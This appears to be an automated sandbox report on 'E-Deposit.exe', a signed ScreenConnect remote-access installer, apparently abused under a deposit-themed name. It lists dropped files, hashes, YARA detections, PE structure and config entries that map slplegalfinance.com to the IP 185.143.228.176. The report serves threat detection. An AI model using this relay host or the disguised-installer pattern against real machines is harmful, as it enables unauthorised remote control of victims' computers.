                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLWa/vXbAa3xT:2dL9hK6E46YPaDEWwvH
                                                                                  MD5:8B35A1388BC25273740A530380E2CEBD
                                                                                  SHA1:2CBE5271637591A0A0D5E20013A66337C168409F
                                                                                  SHA-256:9510C9FD8D26E5DCA7138ABD224080A26392321990C817119AD7014505E3A8E8
                                                                                  SHA-512:1EF2309255D348E89CE8A9F20736558DA6D0BB762B60F2B49D0ABDFE434EDF576EED5D4E05EDE1F0F3FB6E76628D278F97BE805CD1A48687787D0B9E5AB18F53
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a47%3a36</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDF/vXbAa3xT:2dL9hK6E46YPaDEkhvH
                                                                                  MD5:CA5D8DA6D5DAEC562A123656995423A1
                                                                                  SHA1:014BB74B6C0AAC3D26097FBDB1DFC50483EE9249
                                                                                  SHA-256:2D40F81CB9F0A2C03A47E7D84ED4C3C9C1AC13F7F55F4E0DA4C5C23CA1D89E2D
                                                                                  SHA-512:C61F1F56B56E5F9D0AE7B4C22E33E735E9B45A32708558D945E1641AEB5EA47ADF8D38C21D7E8021936572CBDB62EE3F62FE9A687682A32F07F2B1EB7720E395
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a58</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.036871464815543
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLQ5/vXbAa3xT:2dL9hK6E46YPaDEQRvH
                                                                                  MD5:CA943B276BD396FF3B3146E7165EE080
                                                                                  SHA1:FD0A0990C34CA645E6AC16D908F6532297AFFC73
                                                                                  SHA-256:52CDD6BEEFE33FE79D4F58F1917EC28E2FD5CF43A1B15C8F563D59D6725AB72F
                                                                                  SHA-512:FAB7839CBB7CF8764DA5BDEA131CBB7C8AEF3EA1AF248BB204A1D05C815E2200049D4C66C365E55FF60AD7FC2EFFFF38E3AD359837C0EB1BED6AC17F416D8A20
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a48%3a56</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.037076196089594
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDM/vXbAa3xT:2dL9hK6E46YPaDEkOvH
                                                                                  MD5:20E6B0C8F0AB203C0D815064580189E1
                                                                                  SHA1:832448460B22C00B6609F0DA9A2EBFE25C5F9781
                                                                                  SHA-256:0EC684F2EC4869D673D50EA6DC8D511227B858EE848E4E35554C65598DC7EB7D
                                                                                  SHA-512:24828BBABFA607F7C3E35EA3BD193C4D51FB763D064F6C4E38C5F39EE2E4C93637245BB8B7F1C17C1F4615B76306192116F8D944F38AF722980D2DA8E5398527
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a19</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.035566031827628
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkDn/vXbAa3xT:2dL9hK6E46YPaDEkDvH
                                                                                  MD5:1AD4D215525105E2D9DE4449E31A9D6B
                                                                                  SHA1:19CC3497FCDAAE3983D2EE4892CF884BB5EE8B46
                                                                                  SHA-256:5149B9AA3DEDFA24F2A47BD2FCAF2BB377BB8D501C7BEAE221167CDC90D1831E
                                                                                  SHA-512:A2643F9B6F819F0FE506BD24D6175794D1D7A6A84176EF53B27218293CCD11A3410F373B26DE87D192F14C0BB1371F748C6D09058E2898C27298CB1B1B0CE043
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a16</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):566
                                                                                  Entropy (8bit):5.03394114748391
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOkDuLkD+/vXbAa3xT:2dL9hK6E46YPaDEkAvH
                                                                                  MD5:F0F149742C23ADDB81BC554D299DA88D
                                                                                  SHA1:1AF57E909B4CB41B12AE9CF7392E37DBE2825777
                                                                                  SHA-256:A139EF83FA26CB94F5C1B06B1B4CEFAF91A724F4825F1258578C6E50FDF88A05
                                                                                  SHA-512:8AD1AB555B212E70A1A0388F54D8B314745938609CAB540743D3B138552EC0B656614C5DD31906B91CCC5459D6CB2C49FA6C9DFB7B1EBBA789050E6FB642A169
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>slplegalfinance.com=185.143.228.176-06%2f01%2f2025%2010%3a46%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF0DB2C6A1117BC15C.TMP, Author: Joe Security
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.07795815855168775
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOUVPQWASKChiVky6l51:2F0i8n0itFzDHFUVPV7r
                                                                                  MD5:79654B3D5A84C6D9BF1AACB08299C584
                                                                                  SHA1:17D38B9217295DCEF248D7B1C14CC74D19C8878B
                                                                                  SHA-256:3C81D4C3FC24E12DCD46EF027F965167EB1D701B30AFA0BD581CC65DB83C1D07
                                                                                  SHA-512:83B60D97FAA3D809C0297EE92EAA01D65A7F475EC1140AF881811C6FB2190FAB861BC66E145C1879771AFAF2DF9071F8F7ECF9C4AC2039B6E00571E5593D5635
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.234946822766646
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:xbzDBAdum1S3qcq56Adum1Si5zaIdSAYxXV3jzoo7rqQG979e:9M1xph1fdaIdAxJ5u
                                                                                  MD5:CFC3EF4427F61A6604588E78B53C20D1
                                                                                  SHA1:47A69F55310E27976CA1016882B09EE089DF67AB
                                                                                  SHA-256:809722FDB76FC544F4476128AAAF65220B1465A673E84FD01C535EFD9AA033E9
                                                                                  SHA-512:B5D9AFDA96AEA91D4156BCFF8ED65E4155F68BD5ABC98964D73CB15E840D7054062D935576C9E9847C2C90D782A120A6EEAA69308151635D30732EFF0903A886
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF324137F551FF48C3.TMP, Author: Joe Security
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF85B4BC076AE408FE.TMP, Author: Joe Security
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF86AC890801A3F764.TMP, Author: Joe Security
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4215826129494757
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:J4bu0th8FXzvT5aUUP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SID2:abWRTozzuph1fdaIdAxJH11
                                                                                  MD5:AAB68382702FD067399E040774558BCF
                                                                                  SHA1:061EF788A10044307BCEDE3A078CD53F375D5705
                                                                                  SHA-256:4660A518396F9DECBAAC6D272186A2D7796B6274B39997101A56B5E7C2BF15BA
                                                                                  SHA-512:64E54374F6FF534C4B782AF031C31F96E4DECD25621384510981C2647969539F6402B842E0B265B62CD706762F927ACD9E6A2334D7993E7962F83EBDDE7EBBEF
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.8016387648894603
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:L8PhDuRc06WXzuFT5nP979BIsqcq56Adum1Si5zaIdSAYxXV3jzoo7rWAdum1SI6:yhD1zFTXzuph1fdaIdAxJH11
                                                                                  MD5:34A8C52EFBBB37599363A63A30D0E932
                                                                                  SHA1:1ABE2E86C5352B362F58606F927FE267F82A504D
                                                                                  SHA-256:CC1556D554C2917516FB7554BEAF11742A17CF25270298DBCBFC95F180933E5B
                                                                                  SHA-512:7F446DF0540E1661C1DC892B5DAFD65779CF3FE5EAAA3BBB5F2EFC04EA1D44420174A7C819210D41747B32FE6C5BD4D1336EBF8D17EB527FC745BEDF197D84D3
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFC2C1B5F26C92D1A2.TMP, Author: Joe Security
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.427623078135939
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:E-Deposit.exe
                                                                                  File size:5'627'248 bytes
                                                                                  MD5:70d47fa2e078f04400d3d1b236245678
                                                                                  SHA1:987aa3368265fc300b10b4128d8367c3d7a29c6c
                                                                                  SHA256:b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
                                                                                  SHA512:a078ec2aa08f1928b7cef2b3b17e02e5a52860dd684ad798ab8aca0a55d1069f45e27497fabf15c4e932299fe206ed4e49085848a1bc3ae087b13ece36f768e2
                                                                                  SSDEEP:49152:AEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:pEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                  TLSH:B146E111B3DA95B9D4BF0638D87A82699A74BC044712C7EF53D4BD2D2D32BC05E323A6
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
                                                                                  Not Before, Not After
                                                                                  • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                  Instruction
                                                                                  call 00007F7A00BA36FAh
                                                                                  jmp 00007F7A00BA31AFh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F7A00BA3337h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h
                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533074 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x17b70 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
The IMAGE_DIRECTORY_ENTRY_SECURITY value is a raw file offset rather than an RVA, which is why it maps to no section: the Authenticode certificate table (0x17b70 bytes) sits after the last section's raw data.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533074 | 0x533200 | d813d73373778ed5b0a4b71b252379eb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d4 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3962220149253731
FILES | 0x9c3d4 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111589431762695
FILES | 0x2409d4 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415066442757009
FILES | 0x25b5d4 | 0x2ec318 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9810924530029297
FILES | 0x5478ec | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548eec | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
